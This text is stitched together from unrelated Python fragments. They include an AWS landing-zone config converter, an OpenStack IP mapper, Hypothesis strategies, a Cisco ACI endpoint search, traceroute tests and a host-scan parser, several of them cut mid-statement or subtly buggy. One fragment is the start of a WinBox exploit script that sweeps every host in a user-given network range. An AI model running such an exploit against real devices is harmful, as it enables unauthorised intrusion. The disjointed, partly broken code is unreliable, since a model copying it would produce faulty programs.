0 i -= 1 firstHostSingle[i] = 1 firstHostBin = combingToBinary(firstHostSingle) firstHostDec = binaryToDecimal(firstHostBin)
def impl(accel_prefix, config_file, region, load_db, load_config): with open(config_file) as f: config = json.load(f) with open('prettier-config.json', 'w') as f: json.dump(config, f, indent=2) if load_db: load_to_ddb(accel_prefix, region, config) if not load_config: return print("Converting Configuration file with respect to updated accelerator") for config_section in config_sections.keys(): if config_section == 'global-options': print('Updating global options') global_key_configs = config[config_section] if config[config_section].get('alz-baseline') == False or config[ config_section].get('alz-baseline') == True: del config[config_section]['alz-baseline'] for key_name in global_key_configs: ## This section will get renamed to aws-org-management if key_name == 'aws-org-master': config[config_section][key_name]['add-sns-topics'] = True if key_name == 'central-security-services': config[config_section][key_name][ 'macie-sensitive-sh'] = True config[config_section][key_name][ 'fw-mgr-alert-level'] = "Low" config[config_section][key_name][ 'security-hub-findings-sns'] = "Low" config[config_section][key_name]['add-sns-topics'] = True if key_name == 'cloudwatch': config[config_section][key_name]['metrics'].append({ 'filter-name': 'IgnoreAuthorizationFailureMetric', 'accounts': ["management"], 'regions': ["${HOME_REGION}"], 'loggroup-name': '/${ACCELERATOR_PREFIX_ND}/CloudTrail', 'filter-pattern': '{($.errorCode=\"*UnauthorizedOperation\") || ($.errorCode=\"AccessDenied*\")}', 'metric-namespace': 'CloudTrailMetrics', 'metric-name': 'IgnoreAuthorizationFailureCount', 'metric-value': '1' }) config[config_section][key_name]['metrics'].append({ 'filter-name': 'IgnoreConsoleSignInWithoutMfaMetric', 'accounts': ["management"], 'regions': ["${HOME_REGION}"], 'loggroup-name': '/${ACCELERATOR_PREFIX_ND}/CloudTrail', 'filter-pattern': '{($.eventName=\"ConsoleLogin\") && ($.additionalEventData.MFAUsed !=\"Yes\")}', 'metric-namespace': 'CloudTrailMetrics', 'metric-name': 'IgnoreConsoleSignInWithoutMfaCount', 'metric-value': '1' }) config[config_section][key_name]['alarms'][ 'default-in-org-mgmt-use-lcl-sns'] = True config[config_section][key_name]['alarms'][ 'definitions'].append({ 'alarm-name': 'IGNORE-AWS-Authorization-Failure', 'metric-name': 'IgnoreAuthorizationFailureCount', 'sns-alert-level': 'Ignore', 'alarm-description': 'Alarms when one or more unauthorized API calls are made (in any account, any region of your AWS Organization).' }) config[config_section][key_name]['alarms'][ 'definitions'].append({ 'alarm-name': 'IGNORE-AWS-Console-SignIn-Without-MFA', 'metric-name': 'IgnoreConsoleSignInWithoutMfaCount', 'sns-alert-level': 'Ignore', 'alarm-description': 'Alarms when MFA is NOT used to sign into the console with IAM (in any account, any region of your AWS Organization).' }) if key_name == 'aws-config': rules = config[config_section][key_name]['rules'] for rule in rules: if rule['name'] == 'EC2-INSTANCE-PROFILE': rule['runtime'] = 'nodejs14.x' if rule['name'] == 'EC2-INSTANCE-PROFILE-PERMISSIONS': rule['runtime'] = 'nodejs14.x' if key_name == 'scps': scp_list = config[config_section][key_name] scp_list.append({ 'name': 'Guardrails-Part-0-Core', 'description': 'ASEA Guardrails Part 0 Core Accounts', 'policy': 'ASEA-Guardrails-Part0-CoreOUs.json', }) for idx, scp in enumerate(scp_list): if scp['name'] == 'Guardrails-Part-0': scp['description'] = 'ASEA Guardrails Part 0 Workload Accounts' scp['policy'] = 'ASEA-Guardrails-Part0-WkldOUs.json' if scp['name'] == 'Guardrails-Part-2': del config[config_section][key_name][idx] if key_name == 'security-hub-frameworks': standards_list = config[config_section][key_name][ 'standards'] for standard in standards_list: if standard[ 'name'] == 'AWS Foundational Security Best Practices v1.0.0': standard['controls-to-disable'] = [ "IAM.1", "EC2.10", "Lambda.4" ] if standard[ 'name'] == 'CIS AWS Foundations Benchmark v1.2.0': standard['controls-to-disable'] = [ "CIS.1.20", "CIS.1.22", "CIS.2.6" ] if config_section == 'mandatory-account-configs': print('Updating mandatory account configs') mandatory_key_configs = config[config_section] for key_name in mandatory_key_configs: alb_list = config[config_section][key_name].get('alb') if alb_list: for alb in alb_list: if alb.get('tg-stickiness') == "": del alb['tg-stickiness'] target_list = alb['targets'] for target in target_list: if target.get('lambda-filename') == "": del target['lambda-filename'] if config[config_section][key_name].get( 'share-mad-from') == "": del config[config_section][key_name]['share-mad-from'] if key_name == 'shared-network': config[config_section][key_name][ 'description'] = 'This Account is used for centralized or shared networking resources.' config[config_section][key_name]['ou'] = 'Infrastructure' vpc_list = config[config_section][key_name].get('vpc') if (vpc_list): for vpc in vpc_list: if vpc['name'] == 'Endpoint': vpc['description'] = 'This VPC is used to host AWS Service Endpoints, making AWS services available using private address space.' if key_name == 'operations': config[config_section][key_name][ 'description'] = 'This Account is used for centralized IT Operational resources (MAD, rsyslog, ITSM, etc.).' if 'mad' in config[config_section][key_name][ 'deployments']: config[config_section][key_name]['deployments']['mad'][ 'description'] = 'This directory is a) shared to most accounts in the organization to provide centralized Windows and Linux authentication for cloud workloads, b) used as an identity source for AWS SSO, c) used to inter-connect with on-premises directory services, and d) provides a single identities source for instance and AWS console access.' config[config_section][key_name]['deployments']['mad'][ 'image-path'] = '/aws/service/ami-windows-latest/Windows_Server-2016-English-Full-Base' config[config_section][key_name][ 'ou'] = 'Infrastructure' if config[config_section][key_name]['deployments'][ 'mad'].get('share-to-account') == "": del config[config_section][key_name][ 'deployments']['mad']['share-to-account'] if key_name == 'perimeter': config[config_section][key_name][ 'description'] = 'This Account is used for internet facing ingress/egress security services.' config[config_section][key_name]['ou'] = 'Infrastructure' firewall_list = config[config_section][key_name][ 'deployments'].get('firewalls') if (firewall_list): for firewall in firewall_list: firewall['block-device-mappings'] = [ "/dev/sda1", "/dev/sdb" ] if (config[config_section][key_name]['deployments'].get( 'firewall-manager')): config[config_section][key_name]['deployments'][ 'firewall-manager']['block-device-mappings'] = [ "/dev/sda1", "/dev/sdb" ] vpc_list = config[config_section][key_name].get('vpc') if (vpc_list): for vpc in vpc_list: if vpc['name'] == 'Perimeter': vpc['description'] = 'This VPC is used to hold centralized ingress/egress (perimeter) security services.' vpc['alb-forwarding'] = True if key_name == 'management': config[config_section][key_name][ 'description'] = 'This is the Organization Management or root account. Access must be highly restricted. This account should not contain customer resources.' config[config_section][key_name]['ou'] = 'Security' vpc_list = config[config_section][key_name].get('vpc') if (vpc_list): for vpc in vpc_list: if vpc['name'] == 'ForSSO': vpc['description'] = 'This VPC is deployed in the Organization Management/root account to enable the deployment of the Active Directory Connector, enabling the use of Active Directory as the Identity source for AWS SSO.' if key_name == 'log-archive': config[config_section][key_name]['ou'] = 'Security' config[config_section][key_name][ 'description'] = 'This Account is used to centralized and store immutable logs for the Organization.' if key_name == 'security': config[config_section][key_name]['ou'] = 'Security' config[config_section][key_name][ 'description'] = 'This Account is used to centralized access to AWS security tooling and consoles.' if config_section == 'workload-account-configs' and config[ config_section] != {}: print('Updating workload-account-configs') workload_key_configs = config[config_section] for key_name in workload_key_configs: alb_list = config[config_section][key_name].get('alb') if alb_list: for alb in alb_list: if alb.get('tg-stickiness') == "": del alb['tg-stickiness'] target_list = alb['targets'] for target in target_list: if target.get('lambda-filename') == "": del target['lambda-filename'] if config[config_section][key_name].get('share-mad-from'): del config[config_section][key_name]['share-mad-from'] if config_section == 'organizational-units': print('Updating organizational-units') organizational_key_configs = config[config_section] for key_name in organizational_key_configs: alb_list = config[config_section][key_name].get('alb') if alb_list: for alb in alb_list: if alb.get('tg-stickiness') == "": del alb['tg-stickiness'] target_list = alb['targets'] for target in target_list: if target.get('lambda-filename') == "": del target['lambda-filename'] if config[config_section][key_name].get( 'share-mad-from') == "": del config[config_section][key_name]['share-mad-from'] scps = config[config_section][key_name].get('scps') if 'Guardrails-Part-2' in config[config_section][key_name][ 'scps']: if scps: config[config_section][key_name]['scps'].remove( 'Guardrails-Part-2') if key_name == 'core': print('Updating Core OU') ## The core OU will be renamed to Security and copied to create the Infrastructure OU config[config_section][key_name][ 'description'] = 'The Security OU is used to hold AWS accounts containing AWS security resources shared or utilized by the rest of the Organization.' config[config_section][key_name]['scps'].remove( 'Guardrails-Part-0') config[config_section][key_name]['scps'].append( 'Guardrails-Part-0-Core') elif key_name == 'Central': config[config_section][key_name][ 'description'] = 'The Central OU is used to hold AWS accounts which contain group or team resources used across OU boundaries like code promotion tools.' vpc_list = config[config_section][key_name]['vpc'] for vpc in vpc_list: if vpc['name'] == 'Central': vpc['description'] = 'This VPC is deployed in the shared network account and it\'s subnets are shared out to the Operations account and every account in the Central OU.' else: config[config_section][key_name][ 'description'] = f'The {key_name} OU.' vpc_list = config[config_section][key_name].get('vpc') if vpc_list: for vpc in vpc_list: vpc['description'] = f'The {vpc["name"]} vpc in the {key_name} OU.' #create new infrastructure ou as a copy of core if 'core' in config[config_section]: infra_ou = config[config_section]['core'] infra_ou['default-budgets'][ 'name'] = 'Default Infrastructure Budget' infra_ou['description'] = 'The Infrastructure OU' infra_ou[ 'description'] = 'The infrastructure OU is used to hold AWS accounts containing AWS infrastructure resources shared or utilized by the rest of the Organization.' config[config_section]['Infrastructure'] = infra_ou ## Update vpc's and subnet's if (config_section == 'mandatory-account-configs' or config_section == 'workload-account-configs' or config_section == 'organizational-units'): forsso_cidr = "10.24.34.0/24" perimeter_rfc_cidr = "10.24.34.0/24" central_rfc_cidr = "10.24.34.0/24" key_configs = config[config_section] for key_name in key_configs: for vindex, vpcConfig in enumerate(key_configs[key_name].get( 'vpc', [])): if type(config[config_section][key_name]['vpc'][vindex] ['cidr']) == list: print( "Configuration for VPC %s is already in sync with updated SEA" % vpcConfig['name']) continue print( f'Updating vpc {config[config_section][key_name]["vpc"][vindex]["name"]}' ) ## create main pool for cidr block if (vpcConfig['deploy'] == 'local' and vpcConfig['name'] == 'ForSSO'): cidr_pool = 'ForSSO' forsso_cidr = vpcConfig['cidr'] else: cidr_pool = 'main' config[config_section][key_name]['vpc'][vindex]['cidr'] = [ { 'value': vpcConfig['cidr'], 'size': int(vpcConfig['cidr'].split('/')[-1]), 'pool': cidr_pool, } ] ## create pool for cidr2 block if it exists if vpcConfig.get('cidr2'): if type(vpcConfig['cidr2']) == list: for cidr in vpcConfig['cidr2']: if (vpcConfig['deploy'] == 'local' and vpcConfig['name'] == 'Perimeter'): cidr_pool = 'RFC6598b' perimeter_rfc_cidr = cidr elif (vpcConfig['deploy'] == 'shared-network' and vpcConfig['name'] == 'Central'): cidr_pool = 'RFC6598a' central_rfc_cidr = cidr else: cidr_pool = pools['sub'] config[config_section][key_name]['vpc'][ vindex]['cidr'].append({ 'value': cidr, 'pool': cidr_pool, 'size': int(cidr.split('/')[-1]), }) else: if (vpcConfig['deploy'] == 'local' and vpcConfig['name'] == 'Perimeter'): cidr_pool = 'RFC6598b' perimeter_rfc_cidr = vpcConfig['cidr2'] elif (vpcConfig['deploy'] == 'shared-network' and vpcConfig['name'] == 'Central'): cidr_pool = 'RFC6598a' central_rfc_cidr = vpcConfig['cidr2'] else: cidr_pool = pools['sub'] config[config_section][key_name]['vpc'][vindex][ 'cidr'].append({ 'value': vpcConfig['cidr2'], 'pool': cidr_pool, 'size': int(vpcConfig['cidr2'].split('/')[-1]), }) del config[config_section][key_name]['vpc'][vindex][ 'cidr2'] ## add new keys and remove optional keys for vpc config[config_section][key_name]['vpc'][vindex][ 'cidr-src'] = 'provided' if config[config_section][key_name]['vpc'][vindex].get( 'igw') == False: del config[config_section][key_name]['vpc'][vindex][ 'igw'] if not config[config_section][key_name]['vpc'][vindex][ 'vgw']: del config[config_section][key_name]['vpc'][vindex][ 'vgw'] if not config[config_section][key_name]['vpc'][vindex][ 'pcx']: del config[config_section][key_name]['vpc'][vindex][ 'pcx'] if not config[config_section][key_name]['vpc'][vindex][ 'natgw']: del config[config_section][key_name]['vpc'][vindex][ 'natgw'] if 'tgw-attach' in config[config_section][key_name]['vpc'][ vindex]: if not config[config_section][key_name]['vpc'][vindex][ 'tgw-attach']: del config[config_section][key_name]['vpc'][ vindex]['tgw-attach'] if 'interface-endpoints' in config[config_section][ key_name]['vpc'][vindex]: if not config[config_section][key_name]['vpc'][vindex][ 'interface-endpoints']: del config[config_section][key_name]['vpc'][ vindex]['interface-endpoints'] ## update subnets in vpc for sindex, subnetConfig in enumerate( vpcConfig['subnets']): for dindex, subnetDef in enumerate( subnetConfig['definitions']): current_cidr = subnetDef['cidr'] if subnetDef.get( 'cidr', None) else subnetDef['cidr2'] print(current_cidr) print(subnetDef.get('cidr')) #if config[config_section][key_name]['vpc'][vindex]['subnets'][sindex]['definitions']['route-table'] == 'CentralVPC_Common' # config[config_section][key_name]['vpc'][vindex]['subnets'][sindex]['definitions']['route-table'] = '${CONFIG::VPC_NAME}VPC_Common' if (ipaddress.IPv4Network(current_cidr).overlaps( ipaddress.IPv4Network(perimeter_rfc_cidr)) ): cidr_pool = 'RFC6598b' elif (ipaddress.IPv4Network(current_cidr).overlaps( ipaddress.IPv4Network(central_rfc_cidr))): cidr_pool = 'RFC6598a' elif (ipaddress.IPv4Network(current_cidr).overlaps( ipaddress.IPv4Network(forsso_cidr))): cidr_pool = 'ForSSO' else: cidr_pool = 'main' config[config_section][key_name]['vpc'][vindex][ 'subnets'][sindex]['definitions'][dindex][ 'cidr'] = { 'value': current_cidr, 'pool': cidr_pool, 'size': int(current_cidr.split('/')[-1]), } with open('update-config.json', 'w') as f: json.dump(config, f, indent=2) with open('update-config.json') as f: s = f.read() with open('update-config.json', 'w') as f: s = s.replace('"core": {', '"Security": {') s = s.replace('aws-org-master', 'aws-org-management') f.write(s)
def populate_openstack_data(data): """ Fetch all openstack data needed """ data['os'] = {} if DEBUG and os.path.isfile(DEBUG_OPENSTACK_DATA): print("Warning: DEBUG is enabled, reading openstack data from %s" % DEBUG_OPENSTACK_DATA) file = open(DEBUG_OPENSTACK_DATA, "r") data['os'] = json.load(file) else: os_conf = data['config']['openstack'] os_auth = v3.Password(auth_url=os_conf['url'], username=os_conf['user'], password=os_conf['password'], project_name=os_conf['project'], user_domain_name=os_conf['domain'], project_domain_name=os_conf['domain']) os_sess = session.Session(auth=os_auth) headers = {'Accept': 'application/json'} keystone = keystone_client.Client(session=os_sess, connection_pool=True) # We need the ID of the domain. domains = {key.name: key.id for key in keystone.domains.list()} # We need all role ID:s roles = {key.id: key.name for key in keystone.roles.list()} # We need all users users = { key.id: { 'name': key.name, 'email': key.email } for key in keystone.users.list( domain=domains[os_conf['user_domain']]) if hasattr(key, 'email') } # Find the neutron url services = { service.name + '_' + service.type: service.id for service in keystone.services.list() } endpoints = { endpoint.service_id + '_' + endpoint.interface: endpoint.url for endpoint in keystone.endpoints.list() } neutron_url = endpoints[services['neutron_network'] + '_public'] # Fetch project list, ID to project name data['os']['projects'] = { prj.id: { 'name': prj.name, 'emails': {} } for prj in keystone.projects.list() } # Fetch all role assignments and use that to figure out which users belong to which project response = keystone.session.get( os_conf['url'] + '/role_assignments?scope.domain.id' + domains[data['config']['openstack']['user_domain']], headers=headers, authenticated=os_auth) if response.status_code != 200: print("Failed to list role_assignments!") exit(1) roles = response.json() for entry in roles['role_assignments']: if 'scope' in entry and 'user' in entry and 'project' in entry[ 'scope']: user_id = entry['user']['id'] project_id = entry['scope']['project']['id'] if user_id in users: entry = {users[user_id]['email']: users[user_id]['name']} data['os']['projects'][project_id]['emails'].update(entry) data['os']['hosts'] = {} # We need to know the networks to look for networks = [] for netname in data['config']['networks']: networks.append( ipaddress.IPv4Network(data['config']['networks'][netname])) # Get floatingips list response = keystone.session.get(neutron_url + '/v2.0/floatingips', headers=headers, authenticated=os_auth) if response.status_code != 200: print("Failed to get floating IPs list!") exit(1) floatingips = response.json()['floatingips'] # Get port list response = keystone.session.get(neutron_url + '/v2.0/ports', headers=headers, authenticated=os_auth) if response.status_code != 200: print("Failed to get the port list!") exit(1) # Combine them to one list.... Needs some work below though ports = response.json()['ports'] + floatingips for port in ports: if 'device_owner' in port: owner = port['device_owner'] # Skip system IP:s, they are of no use to us if owner == 'network:floatingip' or owner == 'network:router_gateway': continue project = port['project_id'] if project == '': print('Project id is unknown, this should never happen!') pp.pprint(port) exit(1) if 'floating_ip_address' in port: address = ipaddress.ip_address(port['floating_ip_address']) for network in networks: if address in network: data['os']['hosts'][ port['floating_ip_address']] = project else: for ip in port['fixed_ips']: address = ipaddress.ip_address(ip['ip_address']) for network in networks: if address in network: data['os']['hosts'][ip['ip_address']] = project if DEBUG: file = open(DEBUG_OPENSTACK_DATA, "w") json.dump(data['os'], file)
st.builds(range, st.integers(), st.integers()), st.builds(range, st.integers(), st.integers(), st.integers().filter(bool)), ), ipaddress.IPv4Address: ip_addresses(v=4), ipaddress.IPv6Address: ip_addresses(v=6), ipaddress.IPv4Interface: _networks(32).map(ipaddress.IPv4Interface), ipaddress.IPv6Interface: _networks(128).map(ipaddress.IPv6Interface), ipaddress.IPv4Network: st.one_of( _networks(32).map( lambda x: ipaddress.IPv4Network(x, strict=False)), st.sampled_from(SPECIAL_IPv4_RANGES).map(ipaddress.IPv4Network), ), ipaddress.IPv6Network: st.one_of( _networks(128).map( lambda x: ipaddress.IPv6Network(x, strict=False)), st.sampled_from(SPECIAL_IPv6_RANGES).map(ipaddress.IPv6Network), ), os.PathLike: st.builds(PurePath, st.text()), UnicodeDecodeError: st.builds( UnicodeDecodeError, st.just("unknown encoding"), st.just(b""),
0x00, 0x02, 0x00, 0x00, 0x00] cidr = input("Enter network in CIDR: ") try: port = int(input("Enter WinBox port [8291]: ")) except ValueError: print("Using default port 8291") port = 8291 #Default WinBox port. print("Exploit starting...") for ip in ipaddress.IPv4Network(cidr).hosts(): print("***") print(str(ip)) print("***") ip = str(ip) #Initialize Socket s = socket.socket() s.settimeout(3) try:
slice, st.none() | st.integers(), st.none() | st.integers(), st.none() | st.integers(), ), range: st.one_of( st.integers(min_value=0).map(range), st.builds(range, st.integers(), st.integers()), st.builds(range, st.integers(), st.integers(), st.integers().filter(bool)), ), ipaddress.IPv4Address: ip_addresses(v=4), ipaddress.IPv6Address: ip_addresses(v=6), ipaddress.IPv4Interface: _networks(32).map(ipaddress.IPv4Interface), ipaddress.IPv6Interface: _networks(128).map(ipaddress.IPv6Interface), ipaddress.IPv4Network: st.one_of( _networks(32).map(lambda x: ipaddress.IPv4Network(x, strict=False)), st.sampled_from(SPECIAL_IPv4_RANGES).map(ipaddress.IPv4Network), ), ipaddress.IPv6Network: st.one_of( _networks(128).map(lambda x: ipaddress.IPv6Network(x, strict=False)), st.sampled_from(SPECIAL_IPv6_RANGES).map(ipaddress.IPv6Network), ), # Pull requests with more types welcome! } _global_type_lookup[type] = st.sampled_from( [type(None)] + sorted(_global_type_lookup, key=str) ) if sys.version_info[:2] >= (3, 6): # pragma: no branch _global_type_lookup[os.PathLike] = st.builds(PurePath, st.text())
def main(): BANNER() DC_LIST = ['', ''] USER_DETAILS = USERNAME_PASSWORD() APIC_USERNAME = USER_DETAILS[0] APIC_PASSWORD = USER_DETAILS[1] print(colour.BOLD + '\nFilter migration L3Outs?' + colour.END) print( colour.YELLOW + 'This will remove all network centric 0.0.0.0/0 External Subnets from search results' + colour.END) MIGRATION_FILTER = raw_input('\ny/n: ').upper() HEADERS = {'content-type': 'application/json'} # Build endpoint list. time.sleep(1) print(colour.BOLD + '\nGetting Endpoint data.\n' + colour.END) # Returns a list for internal and external endpoints place [0] is internal and [1] external. ENDPOINT_LISTS = GET_ENDPOINTS(DC_LIST, APIC_USERNAME, APIC_PASSWORD, HEADERS) # Build table structure TABLE_ENDPOINT = PrettyTable([ 'Location', 'Tenant', 'App Profile/L3Out', 'EPG Name', 'Endpoint', 'Scope', 'Internal/External' ]) USER_INPUT = '' QUIT = 'quit' print( colour.BOLD + 'Type "quit" to close application and "refresh" to update Endpoint data' + colour.END) while USER_INPUT != QUIT: USER_INPUT = raw_input(colour.BOLD + 'Enter Network: ' + colour.END) if len(USER_INPUT) == 0 or USER_INPUT.startswith('!'): pass elif USER_INPUT == 'refresh': print(colour.BOLD + '\nUpdataing data...' + colour.END) ENDPOINT_LISTS = GET_ENDPOINTS(DC_LIST, APIC_USERNAME, APIC_PASSWORD, HEADERS) print(colour.BOLD + '\nEndpoint data updated' + colour.END) elif USER_INPUT != QUIT: print( colour.BOLD + '\nScope Key: I = Import Route Control, E = Export Route Control, S = Security\n' + colour.END) try: network = ipaddress.IPv4Network(unicode(USER_INPUT)) for i in ENDPOINT_LISTS[1]: if MIGRATION_FILTER == 'Y' and i['Tenant'].startswith( ('PRD', 'PPE', 'DC1-SBS', 'DC2-SBS', 'DC1-STS', 'DC2-STS', 'DC1-REP', 'DC2-REP', 'DC1-OTV', 'DC2-OTV')) and i['L3Out'].endswith('L3O'): continue elif IPNetwork(USER_INPUT) in IPNetwork( i['Endpoint']) or IPNetwork( i['Endpoint']) in IPNetwork(USER_INPUT): TABLE_ENDPOINT.add_row([ i['Location'], i['Tenant'], i['L3Out'], i['EPG'], i['Endpoint'], i['Scope'], 'EXTERNAL' ]) for i in ENDPOINT_LISTS[0]: if IPAddress(i['Endpoint']) in IPNetwork(USER_INPUT): TABLE_ENDPOINT.add_row([ i['Location'], i['Tenant'], i['App Profile'], i['EPG'], i['Endpoint'], 'N/A', 'INTERNAL' ]) print(TABLE_ENDPOINT) TABLE_ENDPOINT = PrettyTable([ 'Location', 'Tenant', 'App Profile/L3Out', 'EPG Name', 'Endpoint', 'Scope', 'Internal/External' ]) except ValueError: print(colour.YELLOW + USER_INPUT + ' is not a valid network.' + colour.END)
def test_ixp_networks_updater_integration(ixp_networks): """ Process a traceroute having some hops crossing an IXP network. """ raw = open("tests/data/traceroute/mtr_json_2.json").read() t1_id = create_traceroute(raw).id _wait_for_completion() # Compare the SocketIO records emitted by the enricher # with those that we expect to see. socketio_emitted_records = _get_socketio_emitted_records() expected_socketio_emitted_records = _prefix_traceroute_id( EXPECTED_SOCKETIO_EMIT_CALLS_TR2, t1_id ) assert socketio_emitted_records == expected_socketio_emitted_records # Verify that the last call to SocketIO is the one # that notifies about the completion of the # enrichment process. t = Traceroute.get(Traceroute.id == t1_id) socketio_emit_mock.assert_called_with( SOCKET_IO_ENRICHMENT_COMPLETED_EVENT, { "traceroute_id": t1_id, "traceroute": t.to_dict(), "text": t.to_text() }, namespace=f"/t/{t1_id}" ) t = Traceroute.get(Traceroute.id == t1_id) assert t.parsed is True assert t.enriched is True assert len(t.hops) == 8 # Check that the host inside the IXP network is correct. hop = t.get_hop_n(7) assert len(hop.hosts) == 1 host = hop.hosts[0] assert host.original_host == "217.29.66.1" assert str(host.ip) == "217.29.66.1" assert host.name == "mix-1.mix-it.net" assert host.enriched is True assert len(host.origins) == 0 assert host.ixp_network is not None assert host.ixp_network.lan_name is None assert host.ixp_network.ix_name == "MIX-IT" assert host.ixp_network.ix_description == "Milan Internet eXchange" # Now, let's verify that all the enrichers from # the consumer threads got their IP info DB populated # equally. This is to ensure that the IXPNetworksUpdater # properly dispatch the IP info entries to all the # consumers. for thread in CONSUMER_THREADS: for enricher in thread.enrichers: ip_info_db = enricher.ip_info_db assert len(ip_info_db.nodes()) == 4 assert sorted(ip_info_db.prefixes()) == sorted([ "89.97.0.0/16", "93.62.0.0/15", "217.29.66.0/23", "217.29.72.0/21" ]) assert ip_info_db.search_exact( "217.29.66.0/23" ).data["ip_db_info"] == IPDBInfo( prefix=ipaddress.ip_network("217.29.66.0/23"), origins=None, ixp_network=IXPNetwork( lan_name=None, ix_name="MIX-IT", ix_description="Milan Internet eXchange" ) ) # Check now that the IP Info DB is populated properly. db_prefixes = IPInfo_Prefix.select() # Build a dict using DB records to make comparisons easier. db_prefixes_dict = { db_prefix.prefix: db_prefix.origins for db_prefix in db_prefixes } assert len(db_prefixes_dict.keys()) == 4 assert sorted(db_prefixes_dict.keys()) == sorted([ ipaddress.IPv4Network("89.97.0.0/16"), ipaddress.IPv4Network("93.62.0.0/15"), ipaddress.IPv4Network("217.29.66.0/23"), ipaddress.IPv4Network("217.29.72.0/21"), ]) db_prefix = IPInfo_Prefix.get(prefix="217.29.66.0/23") assert db_prefix.to_ipdbinfo() == IPDBInfo( prefix=ipaddress.ip_network("217.29.66.0/23"), origins=None, ixp_network=IXPNetwork( lan_name=None, ix_name="MIX-IT", ix_description="Milan Internet eXchange" ) )
def test_consumers_basic(): """ Create a traceroute and get it parsed and enriched using consumers. """ # Just to be sure that we're actually using the # n. of thread we expect, just in case I'll change # the way consumer threads are spun up while doing # some debugging. assert CONSUMER_THREADS_NUM > 1 assert len(CONSUMER_THREADS) == CONSUMER_THREADS_NUM raw = open("tests/data/traceroute/mtr_json_1.json").read() t_id = create_traceroute(raw).id _wait_for_completion() # Compare the SocketIO records emitted by the enricher # with those that we expect to see. socketio_emitted_records = _get_socketio_emitted_records() expected_socketio_emitted_records = _prefix_traceroute_id( EXPECTED_SOCKETIO_EMIT_CALLS_TR1, t_id ) assert socketio_emitted_records == expected_socketio_emitted_records # Verify that the last call to SocketIO is the one # that notifies about the completion of the # enrichment process. t = Traceroute.select()[0] socketio_emit_mock.assert_called_with( SOCKET_IO_ENRICHMENT_COMPLETED_EVENT, { "traceroute_id": t_id, "traceroute": t.to_dict(), "text": t.to_text() }, namespace=f"/t/{t_id}" ) # Let's check that the traceroute is in the expected # state, and that hops and hosts were processed. t = Traceroute.select()[0] assert t.parsed is True assert t.enriched is True assert len(t.hops) == 10 hop = t.get_hop_n(1) assert len(hop.hosts) == 1 host = hop.hosts[0] assert host.original_host == "192.168.1.254" assert str(host.ip) == "192.168.1.254" assert host.name is None assert host.enriched is True assert len(host.origins) == 0 assert host.ixp_network is None hop = t.get_hop_n(6) assert len(hop.hosts) == 1 host = hop.hosts[0] assert host.original_host == "62-101-124-17.fastres.net" assert str(host.ip) == "62.101.124.17" assert host.name == "62-101-124-17.fastres.net" assert host.enriched is True assert len(host.origins) == 1 origin = host.origins[0] assert origin.asn == 12874 assert origin.holder == "FASTWEB - Fastweb SpA" assert host.ixp_network is None hop = t.get_hop_n(10) assert len(hop.hosts) == 1 host = hop.hosts[0] assert host.original_host == "dns.google" assert str(host.ip) == "8.8.8.8" assert host.name == "dns.google" assert host.enriched is True assert len(host.origins) == 1 origin = host.origins[0] assert origin.asn == 15169 assert origin.holder == "GOOGLE" assert host.ixp_network is None # Now, let's verify that all the enrichers from # the consumer threads got their IP info DB populated # equally. This is to ensure that the IP info records # are properly distributed across the consumers. for thread in CONSUMER_THREADS: for enricher in thread.enrichers: ip_info_db = enricher.ip_info_db assert len(ip_info_db.nodes()) == 5 assert sorted(ip_info_db.prefixes()) == sorted([ "89.97.0.0/16", "62.101.124.0/22", "209.85.128.0/17", "216.239.32.0/19", "8.8.8.0/24", ]) assert ip_info_db.search_exact( "89.97.0.0/16" ).data["ip_db_info"] == IPDBInfo( prefix=ipaddress.ip_network("89.97.0.0/16"), origins=[ (12874, "FASTWEB - Fastweb SpA") ], ixp_network=None ) # Check now that the IP Info DB is populated properly. db_prefixes = IPInfo_Prefix.select() # Build a dict using DB records to make comparisons easier. db_prefixes_dict = { db_prefix.prefix: db_prefix.origins for db_prefix in db_prefixes } assert len(db_prefixes_dict.keys()) == 5 assert sorted(db_prefixes_dict.keys()) == sorted([ ipaddress.IPv4Network("89.97.0.0/16"), ipaddress.IPv4Network("62.101.124.0/22"), ipaddress.IPv4Network("209.85.128.0/17"), ipaddress.IPv4Network("216.239.32.0/19"), ipaddress.IPv4Network("8.8.8.0/24") ]) db_prefix = IPInfo_Prefix.get(prefix="89.97.0.0/16") assert db_prefix.to_ipdbinfo() == IPDBInfo( prefix=ipaddress.ip_network("89.97.0.0/16"), origins=[ (12874, "FASTWEB - Fastweb SpA") ], ixp_network=None ) # Verify that metrics logging is working properly. # To see which metrics have been collected: # metrics_mock_wrapper.mm.print_records() mm_records = metrics_mock_wrapper.mm.get_records() # Expecting 5 calls to the function that performs # external queries to fetch IP info. # Every time, we want the counter to be increased. mm_ip_info_from_external_sources = filter( lambda r: ( r[0] == "incr" and r[1] == ("rich_traceroute.enrichers.enricher." "ip_info_from_external_sources") and r[2] == 1 ), mm_records ) assert len(list(mm_ip_info_from_external_sources)) == 5 # Check that we're keeping track of how long those # 5 upstream queries take to complete. mm_ip_info_from_external_sources = filter( lambda r: ( r[0] == "timing" and r[1] == ("rich_traceroute.enrichers.enricher." "ripestat.query_time") ), mm_records ) assert len(list(mm_ip_info_from_external_sources)) == 5
except subprocess.CalledProcessError: response = None print(' ' + ip + ' is down!') #------------------------------Begin Main------------------------------# # Read commandline switches position = 1 while (arguments >= position): #Destination IP for remote scan if sys.argv[position] == '-dst_ip': argstring = sys.argv[position + 1] #Check if given in CIDR notation if argstring.find('/', 0, len(argstring)) != -1: for ip in ipaddress.IPv4Network(argstring): dst_ip.append(str(ip)) #Remove Network Address del dst_ip[0] #Remove Broadcast Address dst_ip.pop() #Check if given an IP Range elif argstring.find('-', 0, len(argstring)) != -1: dst_ip = (argstring).split('-') beg_ip = int(dst_ip[0]) end_port = int(dst_ip[1]) dst_ip.clear() while (dst_ip <= end_port):
